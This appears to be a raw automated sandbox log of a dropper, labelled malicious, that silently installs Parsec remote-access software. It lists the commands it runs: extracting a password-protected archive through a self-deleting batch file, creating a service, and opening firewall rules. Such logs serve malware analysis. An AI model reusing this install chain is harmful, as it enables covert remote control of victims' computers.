Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FE15000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2029324917.00000000025F9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000000.2028002114.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2295037831.0000000002238000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exeBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engineClassification label: mal42.evad.winEXE@127/204@2/2
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C314560 GetLastError,FormatMessageA,LocalFree,48_2_00007FF72C314560
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F86830 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,6_2_00F86830
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7BD0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_00F7BD0C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,13_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,45_2_0040352D
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3148D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,48_2_00007FF72C3148D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA48D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,51_2_00007FF7E5AA48D0
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,65_2_0040352D
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181648D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,71_2_00007FF6181648D0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7BC48 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,6_2_00F7BC48
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,48_2_00007FF72C314400
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,51_2_00007FF7E5AA4400
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,71_2_00007FF618164400
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD031850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle,39_2_00007FF7CD031850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_004021AA CoCreateInstance,13_2_004021AA
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032AC0 StartServiceCtrlDispatcherW,39_2_00007FF7CD032AC0
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032AC0 StartServiceCtrlDispatcherW,39_2_00007FF7CD032AC0
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2804:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "parsecd.exe")
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: nefconc.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconc.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconc.exeString found in binary or memory: --install-driver
Source: nefconc.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconc.exeString found in binary or memory: --inf-default-install
Source: nefconc.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconc.exeString found in binary or memory: --add-class-filter
Source: nefconw.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconw.exeString found in binary or memory: --inf-default-install
Source: nefconw.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exeString found in binary or memory: --install-driver
Source: nefconw.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exeString found in binary or memory: --add-class-filter
Source: nefconw.exeString found in binary or memory: --install-driver
Source: nefconw.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exeString found in binary or memory: --inf-default-install
Source: nefconw.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconw.exeString found in binary or memory: --add-class-filter
Source: uu8v4UUzTU.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile read: C:\Users\user\Desktop\uu8v4UUzTU.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\uu8v4UUzTU.exe "C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files\Parsec\pservice.exe "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"Jump to behavior
